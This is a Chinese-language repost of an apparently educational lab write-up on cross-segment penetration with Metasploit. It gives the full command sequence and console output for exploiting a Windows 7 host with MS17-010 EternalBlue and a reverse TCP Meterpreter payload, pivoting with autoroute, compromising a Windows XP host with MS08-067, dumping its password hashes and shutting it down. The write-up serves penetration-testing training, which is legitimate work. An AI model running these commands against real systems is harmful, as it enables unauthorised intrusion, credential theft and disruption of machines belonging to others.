您当前的位置:首页 > 电脑百科 > 安全防护 > 黑客技术

Windows网络服务渗透测试实战-跨网段攻击

时间:2022-11-01 12:12:18  来源:CSDN  作者:懒笑翻

一、实验项目名称

windows网络服务渗透测试实战-跨网段攻击

二、实验目的及要求

掌握对跨网段攻击的方法。

熟悉Metasploit终端的使用方法。

熟悉通过meterpreter进行后渗透操作

获取winxp系统管理员admin的密码,并使xp系统关机

----基础配置----

1、选择win7

 


 


 


 

2、选择winXP

 


 

3、选择kali

 


 

4、查看kali的ip

 

5、查看winXP的ip

 

6、查看win7的IP

 

总结如下:

WinXP

Win7

Kali

网络适配器 桥接模式(自动)

192.168.43.99

网络适配器 桥接模式(自动)

192.168.43.89

网络适配器 NAT

192.168.232.128

网络适配器2 NAT

192.168.232.145

----开始跨网段攻击----

1、输入 msfconsole 启动metasploit

 

2、使用“永恒之蓝”的漏洞模块,使用扫描命令进行网段内主机扫描

use
auxiliary/scanner/smb/smb_ms17_010 //进入扫描模块

set rhosts (目标网段) //扫描目标网段内的主机

set threads 512 //设置扫描线程

run //执行

 

3、设置攻击步骤进行攻击

use
exploit/windows/smb/ms17_010_eternalblue //利用攻击模块

set rhost (目标IP) //设置目标IP

set lhost (监听主机IP) //设置监听IP

set payload
windows/x64/meterpreter/reverse_tcp //设置攻击载荷

run

 

4、通过meterpreter终端获取系统控制台shell,执行ipconfig发现主机存在双网段

 

5、获取shell权限,在cmd窗口试图下输入 arp -a 可以发现,存在同网段的地址

 

6、返回meterpreter终端将内网网段192.168.232.128/24添加值路由表

run autoroute -s 192.168.232.128/24

run autoroute -p //查看路由表状况

 

7.使用 background 退出到msf试图,并搜索 ms08-067 ,此处可以看到内网主机是XP系统,直接使用 ms08- 067 进行攻击

backgroup

search ms08-067

use
exploit/windows/smb/ms08_067.NETapi //利用攻击模块

set payload
windows/meterpreter/bind_tcp //设置攻击载荷

set rhost (目标IP) //设置监听IP

run

 


 

8、获取winxp系统管理员admin的密码

 

9、使xp系统关机

 


 


 

关机之后kali中会失去会话

 

┌──(kali㉿kali)-[~/Desktop]

└─$ ip a

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000

link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00

inet 127.0.0.1/8 scope host lo

valid_lft forever preferred_lft forever

inet6 ::1/128 scope host

valid_lft forever preferred_lft forever

2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000

link/ether 00:0c:29:68:f4:d1 brd ff:ff:ff:ff:ff:ff

inet 192.168.43.89/24 brd 192.168.43.255 scope global dynamic noprefixroute eth0

valid_lft 2911sec preferred_lft 2911sec

inet6 240e:468:81:203c:da81:9549:e675:f2e0/64 scope global temporary dynamic

valid_lft 3538sec preferred_lft 3538sec

inet6 240e:468:81:203c:20c:29ff:fe68:f4d1/64 scope global dynamic mngtmpaddr noprefixroute

valid_lft 3538sec preferred_lft 3538sec

inet6 fe80::20c:29ff:fe68:f4d1/64 scope link noprefixroute

valid_lft forever preferred_lft forever

 

┌──(kali㉿kali)-[~/Desktop]

└─$ msfconsole

_ _

/ / __ _ __ /_/ __

| | / | _____ ___ _____ | | / _

| | /| | | ___ |- -| / / __ | -__/ | || | || | |- -|

|_| | | | _|__ | |_ / - __ | | | | __/| | | |_

|/ |____/ ___/ / \___/ / __| |_ ___

=[ metasploit v6.1.4-dev ]

+ -- --=[ 2162 exploits - 1147 auxiliary - 367 post ]

+ -- --=[ 592 payloads - 45 encoders - 10 nops ]

+ -- --=[ 8 evasion ]

Metasploit tip: Open an interactive Ruby terminal with

irb

msf6 > use auxiliary/scanner/smb/smb_ms17_010

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.43.99

rhosts => 192.168.43.99

msf6 auxiliary(scanner/smb/smb_ms17_010) > set threads 512

threads => 512

msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.43.99:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)

[*] 192.168.43.99:445 - Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue

[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.43.99

rhost => 192.168.43.99

msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.43.89

lhost => 192.168.43.89

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

payload => windows/x64/meterpreter/reverse_tcp

msf6 exploit(windows/smb/ms17_010_eternalblue) > run

 

[*] Started reverse TCP handler on 192.168.43.89:4444

[*] 192.168.43.99:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check

[+] 192.168.43.99:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)

[*] 192.168.43.99:445 - Scanned 1 of 1 hosts (100% complete)

[+] 192.168.43.99:445 - The target is vulnerable.

[*] 192.168.43.99:445 - Connecting to target for exploitation.

[+] 192.168.43.99:445 - Connection established for exploitation.

[+] 192.168.43.99:445 - Target OS selected valid for OS indicated by SMB reply

[*] 192.168.43.99:445 - CORE raw buffer dump (38 bytes)

[*] 192.168.43.99:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima

[*] 192.168.43.99:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service

[*] 192.168.43.99:445 - 0x00000020 50 61 63 6b 20 31 Pack 1

[+] 192.168.43.99:445 - Target arch selected valid for arch indicated by DCE/RPC reply

[*] 192.168.43.99:445 - Trying exploit with 12 Groom Allocations.

[*] 192.168.43.99:445 - Sending all but last fragment of exploit packet

[*] 192.168.43.99:445 - Starting non-paged pool grooming

[+] 192.168.43.99:445 - Sending SMBv2 buffers

[+] 192.168.43.99:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.

[*] 192.168.43.99:445 - Sending final SMBv2 buffers.

[*] 192.168.43.99:445 - Sending last fragment of exploit packet!

[*] 192.168.43.99:445 - Receiving response from exploit packet

[+] 192.168.43.99:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!

[*] 192.168.43.99:445 - Sending egg to corrupted connection.

[*] 192.168.43.99:445 - Triggering free of corrupted buffer.

[*] Sending stage (200262 bytes) to 192.168.43.99

[*] Meterpreter session 1 opened (192.168.43.89:4444 -> 192.168.43.99:50762) at 2022-05-18 22:23:55 -0400

[+] 192.168.43.99:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[+] 192.168.43.99:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[+] 192.168.43.99:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > shell

Process 7924 created.

Channel 1 created.

Microsoft Windows [�汾 6.1.7601]

��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:Windowssystem32>chcp 65001

chcp 65001

Active code page: 65001

C:Windowssystem32>ipconfig

ipconfig

Windows IP Configuration

Ethernet adapter �������� 2:

Connection-specific DNS Suffix . : localdomAIn

Link-local IPv6 Address . . . . . : fe80::e970:4199:33c6:f0f3%21

IPv4 Address. . . . . . . . . . . : 192.168.232.145

Subnet Mask . . . . . . . . . . . : 255.255.255.0

Default Gateway . . . . . . . . . : 192.168.232.2

Ethernet adapter Bluetooth ��������:

Media State . . . . . . . . . . . : Media disconnected

Connection-specific DNS Suffix . :

Ethernet adapter ��������:

Connection-specific DNS Suffix . :

IPv6 Address. . . . . . . . . . . : 240e:468:81:203c:6d7a:d608:7ec3:80e

Temporary IPv6 Address. . . . . . : 240e:468:81:203c:b1e9:713c:1d5d:3a38

Link-local IPv6 Address . . . . . : fe80::6d7a:d608:7ec3:80e%11

IPv4 Address. . . . . . . . . . . : 192.168.43.99

Subnet Mask . . . . . . . . . . . : 255.255.255.0

Default Gateway . . . . . . . . . : fe80::284a:4a93:2ef9:661b%11

192.168.43.1

Tunnel adapter isatap.{D0C9B1FF-3866-45AB-BD3C-6BCCE51D708F}:

Media State . . . . . . . . . . . : Media disconnected

Connection-specific DNS Suffix . :

Tunnel adapter isatap.{AA43B9EC-6828-4E2A-ACED-837F5FF4C2C8}:

Media State . . . . . . . . . . . : Media disconnected

Connection-specific DNS Suffix . :

Tunnel adapter isatap.localdomain:

Media State . . . . . . . . . . . : Media disconnected

Connection-specific DNS Suffix . :

C:Windowssystem32>arp -a

arp -a

Interface: 192.168.43.99 --- 0xb

Internet Address Physical Address Type

192.168.43.1 12-2b-33-95-ca-ca dynamic

192.168.43.89 00-0c-29-68-f4-d1 dynamic

192.168.43.107 50-e0-85-a8-bc-86 dynamic

192.168.43.162 50-e0-85-a8-bc-86 dynamic

192.168.43.170 50-e0-85-a8-bc-86 dynamic

192.168.43.223 c0-3c-59-b9-be-3c dynamic

192.168.43.255 ff-ff-ff-ff-ff-ff static

224.0.0.22 01-00-5e-00-00-16 static

224.0.0.252 01-00-5e-00-00-fc static

239.255.255.250 01-00-5e-7f-ff-fa static

255.255.255.255 ff-ff-ff-ff-ff-ff static

Interface: 192.168.232.145 --- 0x15

Internet Address Physical Address Type

192.168.232.1 00-50-56-c0-00-08 dynamic

192.168.232.2 00-50-56-fb-6f-4e dynamic

192.168.232.128 00-0c-29-52-81-07 dynamic

192.168.232.254 00-50-56-e3-a4-9f dynamic

192.168.232.255 ff-ff-ff-ff-ff-ff static

224.0.0.22 01-00-5e-00-00-16 static

224.0.0.252 01-00-5e-00-00-fc static

239.255.255.250 01-00-5e-7f-ff-fa static

255.255.255.255 ff-ff-ff-ff-ff-ff static

C:Windowssystem32>exit

meterpreter > run autoroute -s 192.168.232.128/24

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.

[!] Example: run post/multi/manage/autoroute OPTION=value [...]

[*] Adding a route to 192.168.232.128/255.255.255.0...

[+] Added route to 192.168.232.128/255.255.255.0 via 192.168.43.99

[*] Use the -p option to list all active routes

meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.

[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table

====================

Subnet Netmask Gateway

------ ------- -------

192.168.232.128 255.255.255.0 Session 1

meterpreter > background

[*] Backgrounding session 1...

msf6 exploit(windows/smb/ms17_010_eternalblue) > search ms08-067

Matching Modules

================

# Name Disclosure Date Rank Check Description

- ---- --------------- ---- ----- -----------

0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption

Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi

msf6 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms08_067_netapi

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/bind_tcp

payload => windows/meterpreter/bind_tcp

msf6 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.232.128

rhost => 192.168.232.128

msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] 192.168.232.128:445 - Automatically detecting the target...

[*] 192.168.232.128:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English

[*] 192.168.232.128:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)

[*] 192.168.232.128:445 - Attempting to trigger the vulnerability...

[*] Started bind TCP handler against 192.168.232.128:4444

[*] Sending stage (175174 bytes) to 192.168.232.128

[*] Meterpreter session 2 opened (192.168.232.145:51366 -> 192.168.232.128:4444) at 2022-05-18 22:38:20 -0400

meterpreter > shell

Process 7092 created.

Channel 1 created.

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:WINDOWSsystem32>ipconfig

ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :

IP Address. . . . . . . . . . . . : 192.168.232.128

Subnet Mask . . . . . . . . . . . : 255.255.255.0

Default Gateway . . . . . . . . . : 192.168.10.254

C:WINDOWSsystem32>getuid

getuid

'getuid' is not recognized as an internal or external command,

operable program or batch file.

C:WINDOWSsystem32>exit

meterpreter > getuid

Server username: NT AUTHORITYSYSTEM

meterpreter > hashdump

Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

HelpAssistant:1000:32f842845a64f17ccbe6b10315169b7e:83789c0d8506a618d815fd9c6fb379e1:::

IUSR_DH-CA8822AB9589:1003:de8b8cec054052bb8ab2d451a3e61856:145f992fa5ff125301520f8e27419c6d:::

IWAM_DH-CA8822AB9589:1004:90b05d38a1fc8d80a4ae31c7bc961352:2f950167d2942f7c977fdfd1857b8a59:::

SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:bb5a5a239a6e521be591fdf091b05013:::

meterpreter > shell

Process 8096 created.

Channel 2 created.

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:WINDOWSsystem32>shutdown -s -t 5

shutdown -s -t 5

C:WINDOWSsystem32>

[*] 192.168.232.128 - Meterpreter session 2 closed. Reason: Died

 

————————————————

版权声明:本文为CSDN博主「懒笑翻」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。

原文链接:
https://blog.csdn.net/c_lanxiaofang/article/details/124857251



Tags:跨网段   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,不构成投资建议。投资者据此操作,风险自担。如有任何标注错误或版权侵犯请与我们联系,我们将及时更正、删除。
▌相关推荐
免费开源、跨网段的机房电脑监控软件Veyon安装与配置
问题场景最近学校各栋教学楼安装了一批智慧黑板。想能不能找个软件统一管理这一批智慧黑板。首先想到采用极域、红蜘蛛这样的多媒体教学管理软件。但发现以上两种软件不支持...【详细内容】
2023-02-27  Search: 跨网段  点击:(336)  评论:(0)  加入收藏
Windows网络服务渗透测试实战-跨网段攻击
一、实验项目名称Windows网络服务渗透测试实战-跨网段攻击二、实验目的及要求掌握对跨网段攻击的方法。熟悉Metasploit终端的使用方法。熟悉通过meterpreter进行后渗透操作...【详细内容】
2022-11-01  Search: 跨网段  点击:(537)  评论:(0)  加入收藏
网络打印机跨网段无法打印?教你个简单有效的处理方法
在局域网内,最常见的就是共享打印机,或者直接使用网络打印机,现在当然更推荐后者,正常来说,跨VLAN网段打印,是没什么问题的。而公有云桌面,也是可以打印到本地打印机的,USB映射的方...【详细内容】
2022-03-30  Search: 跨网段  点击:(625)  评论:(0)  加入收藏
华为交换机配置跨网段通过vlanif通信,二层隔离三层通信
网络拓扑:拓扑图通过ospf实现两个不同网段的三层互通二层隔离交换机A vlan及端口配置信息The device is running! <Huawei>system-view #进入系统视图Enter system view, r...【详细内容】
2022-01-14  Search: 跨网段  点击:(1088)  评论:(0)  加入收藏
上网行为管理如何实现跨网段IP-MAC绑定
对于三层交换机划分多个VLAN的局域网来说,要设置IP-MAC绑定可真不容易。在三层交换机上进行IP-MAC绑定,不但配置复杂而且维护工作量很大,所以大部分网管都不会直接在三层交换机...【详细内容】
2019-10-31  Search: 跨网段  点击:(721)  评论:(0)  加入收藏
窥探PC不能通过二层交换机跨网段通信原因:估计你想不到
概述我们都知道不同网段的PC之间要实现互通,中间必须要接个具有三层功能的设备,因为只有三层设备(通常是路由器)才能在不同的网段之间查找路由,实现跨网段互访,如下图所示:PC通过路...【详细内容】
2019-10-30  Search: 跨网段  点击:(654)  评论:(0)  加入收藏
告诉你PC不能通过二层交换机实现跨网段通信的小秘密:你很难想到
我们都知道不同网段的PC之间要实现互通,中间必须要接个具有三层功能的设备,因为只有三层设备(通常是路由器)才能在不同的网段之间查找路由,实现跨网段互访,如下图所示:PC通过路由器...【详细内容】
2019-10-09  Search: 跨网段  点击:(923)  评论:(0)  加入收藏
▌简易百科推荐
小心“黑客”利用445端口攻击你的Win8系统!
Windows 8系统自带一个名为SMB(Server Message Block)的服务,使用445端口进行通信。这个服务主要用于文件共享和网络协议等功能,但是无良黑客也会利用这个服务来攻击你的电脑。...【详细内容】
2024-04-10    潘小姐  Tags:445端口   点击:(3)  评论:(0)  加入收藏
为什么黑客不去攻击微信钱包?
在这个数字化时代,网络安全已经成为我们生活中不可或缺的一部分。每当我们打开手机,使用微信钱包进行支付时,是否曾有过这样的疑问:为什么黑客不去攻击微信钱包?这个问题,就像是在...【详细内容】
2024-02-19  猫探长情报局  今日头条  Tags:黑客   点击:(55)  评论:(0)  加入收藏
发条消息就能破解iPhone?苹果系统这次像被“内鬼”攻破的。。。
前几天,差评君在网上冲浪的时候,看到了一条相当震撼的消息:简单来讲,就是主打封闭安全的 iPhone ,不仅被攻击者发现了漏洞成功入侵,完全控制整个手机。更加抽象的是入侵的还是知名...【详细内容】
2024-01-26  差评    Tags:破解iPhone   点击:(136)  评论:(0)  加入收藏
十种黑客攻击手段及防御方法
在互联网的世界里,网站安全犹如一座城堡,需要严密的防线来抵御各种攻击手段。以下是10种最常见的网络攻击手段,以及我们如何采取措施来保护我们的网站。1. 跨站脚本攻击:这是黑...【详细内容】
2024-01-21  老吴讲IT    Tags:黑客攻击   点击:(83)  评论:(0)  加入收藏
渗透测试中最常见的漏洞有哪些?
什么是渗透测试?渗透测试是一项安全测试,旨在模拟黑客的攻击方式,评估系统、网络或应用程序的安全性,发现潜在的安全漏洞并提出建议来修复它们。渗透测试中最常见的漏洞包括:1....【详细内容】
2024-01-11  五湖联技术服务公司    Tags:渗透测试   点击:(106)  评论:(0)  加入收藏
作为一名黑客/安全专家,应该掌握什么技能?熟悉哪些软件/工具?
作为一名合格的黑客/网络安全专家,应该具备一套全面的知识体系和实战技能,同时熟悉多种安全软件和工具。今天我们将根据目前市面上流行的一些应用程序,以及常规的安全防护措施,...【详细内容】
2023-12-11  黑客联盟I    Tags:黑客   点击:(140)  评论:(0)  加入收藏
黑客是如何入侵一个网站的?(网络安全人员应该了解的知识)
前不久阿里以及滴滴系统的大规模瘫痪足以唤起人们对网络安全的重视。我首先必须澄清的是,作为一个网络安全专家,我不提供或者鼓励任何违法的行为,包括未经授权的计算机系统入侵...【详细内容】
2023-12-07  黑客联盟I    Tags:黑客   点击:(177)  评论:(0)  加入收藏
网络黑客入侵解析:保护你的网络安全
在当今数字化快速发展的时代,网络安全问题逐渐成为人们关注的焦点。网络黑客入侵事件频发,给个人和企业带来了严重的威胁。本文将深入解析网络黑客入侵的常见手段和原因,并探讨...【详细内容】
2023-12-05  小记青春    Tags:黑客入侵   点击:(161)  评论:(0)  加入收藏
黑客滥用 Google 表单进行诈骗
研究人员最近发现滥用 Google 表单的垃圾邮件有所增加,攻击者首先在 Google 表单中创建新的问卷调查,并且利用受害者的电子邮件地址参与问卷调查,滥用 Google 表单的功能将垃圾...【详细内容】
2023-11-23  区块软件开发  今日头条  Tags:黑客   点击:(221)  评论:(0)  加入收藏
黑客工具 Flipper Zero 曝光,可利用蓝牙弹出窗口崩溃 iPhone
据外媒 9to5Mac 报道,一种流行且廉价的黑客设备 Flipper Zero 今年 9 月首次出现,可通过制造蓝牙弹出窗口,向 iPhone 和 iPad 重复告诉发送垃圾内容,直到相关设备最终崩溃,不过直...【详细内容】
2023-11-20  IT之家    Tags:黑客工具   点击:(242)  评论:(0)  加入收藏
站内最新
站内热门
站内头条